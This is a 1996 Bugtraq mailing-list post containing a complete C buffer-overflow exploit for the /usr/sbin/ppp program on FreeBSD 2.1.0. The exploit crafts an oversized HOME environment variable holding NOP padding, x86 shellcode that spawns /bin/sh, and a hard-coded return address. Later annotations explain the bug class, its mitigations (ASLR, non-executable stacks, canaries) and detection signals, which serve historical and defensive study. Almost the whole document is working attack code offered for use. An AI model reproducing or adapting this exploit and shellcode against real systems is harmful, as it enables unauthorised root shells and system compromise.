List: bugtraq
Subject: Exploit for ppp bug (FreeBSD 2.1.0).
From: Leshka Zakharoff <leshka () leshka ! chuvashia ! su>
Date: 1996-12-19 3:00:06
/* ---------------------------- CUT HERE ----------------------------------- */
/* */
/* Hi ! */
/* This is a buffer-overflow exploit for the ppp bug (FreeBSD 2.1.0). */
/* If you have any problems with it, drop me a letter. */
/* Have fun ! */
/* */
/* */
/* ---------------------- */
/* --------------------------------------------- */
/* ----------------- Dedicated to my beautiful lady ------------------ */
/* --------------------------------------------- */
/* ---------------------- */
/* */
/* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */
#include <stdio.h>
/*
 * Proof-of-concept for the FreeBSD 2.1.0 /usr/sbin/ppp stack overflow
 * (Bugtraq, December 1996).
 *
 * What the program does (everything below is visible in the code):
 *   - builds ONE oversized environment string, "HOME=" followed by the
 *     shellcode bytes, padded with 0x90 (x86 NOP) bytes, and ending with a
 *     hard-coded address (start_addr) in the last four bytes before the NUL;
 *   - patches the same address into the shellcode's "XXXX" placeholder;
 *   - execs /usr/sbin/ppp with that single-entry environment.
 *
 * Defensive notes for readers of this archive:
 *   - The bug class is an unchecked copy of an environment variable into a
 *     fixed-size stack buffer; the fix on the target side is a bounded copy
 *     (or rejecting over-long values) and, for a privileged daemon, not
 *     trusting the inherited environment at all.
 *   - The technique depends on a fixed, guessable stack address
 *     (start_addr = 0xefbfde83) and on the stack being executable. Modern
 *     ASLR, W^X / non-executable stacks and stack-protector canaries each
 *     independently break it.
 *   - Detection: unusually long or non-printable environment values handed
 *     to setuid/privileged programs are a useful audit signal.
 *
 * NOTE(review): strstr/strncpy/strlen/execle are called without
 * <string.h>/<unistd.h>; the implicit declarations were tolerated by 1996
 * compilers but are a hard error in C99 and later.
 */
main()
{
/* Total byte length of the HOME string, including the trailing NUL.
 * Presumably tuned so that the final 4-byte start_addr write lands on the
 * saved return address of the vulnerable ppp frame -- not derivable from
 * this file alone. */
#define length 114
int i;
unsigned long start_addr;
char home_string[length];
/* The entire environment passed to ppp: just the crafted HOME= entry. */
char *env[]={
home_string,
NULL
};
/* Position-independent shellcode with inline disassembly.  Bytes that
 * would otherwise be NUL (and so truncate the C string / env copy) are
 * stored as 0x01 and fixed up at run time by the decb/incl instructions. */
char code_string[]=
{
"\xeb\x2a" /* jmp cont */
/* geteip: */ "\x5d" /* popl %ebp */
"\x55" /* pushl %ebp */
"\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */
"\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */
"\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */
"\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */
"\xff\x45\xef" /* incl 0xffffffef(%ebp) */
"\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */
"\xc3" /* ret */
/* 0xffffffe0(%ebp): */ "/bin/sh"
/* 0xffffffe7(%ebp): */ "\x01"
/* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */
"\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */
/* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */
"\xe8\xcb\xff\xff\xff" /* call geteip */
"\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */
"\x55" /* pushl %ebp */
"\x55" /* pushl %ebp */
"\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */
"\x55" /* pushl %ebp */
"\xe8\xd4\xff\xff\xff" /* call execve */
};
/* Fill indices 0..length-3 with 0x90 (NOP) and terminate at length-1.
 * Index length-2 is skipped by the loop but is covered by the 4-byte
 * start_addr write below (indices length-5..length-2), so no byte of the
 * string is left uninitialized. */
for(i=0;i<length-2;home_string[i++]='\x90'); home_string[length-1]='\0';
/* Hard-coded stack address for a fixed 1996 FreeBSD/i386 layout; exactly
 * the assumption ASLR removes. */
start_addr=0xefbfde83;
/* Patch the "XXXX" placeholder inside the shellcode.  Writing through an
 * unsigned long* into a char array is a strict-aliasing/alignment
 * violation by the C standard; it happened to work on i386 of the era. */
*( (unsigned long*) strstr(code_string,"XXXX") )=start_addr;
/* Exactly 5 bytes, deliberately without a NUL terminator: the shellcode
 * must follow "HOME=" immediately. */
strncpy(home_string,"HOME=",5);
/* strlen excludes the terminator, so the NOP padding continues right after
 * the last shellcode byte. */
strncpy(&home_string[5],code_string,strlen(code_string));
/* Overwrite the last four payload bytes (before the NUL) with start_addr. */
*( (unsigned long*) &home_string[length-5])=start_addr;
/* argv = { "/usr/sbin/ppp", NULL }, envp = env (only the crafted HOME).
 * Return value is not checked; on failure the program simply falls off the
 * end of main. */
execle("/usr/sbin/ppp","/usr/sbin/ppp",NULL,env);
}
/* ---------------------------- CUT HERE ----------------------------------- */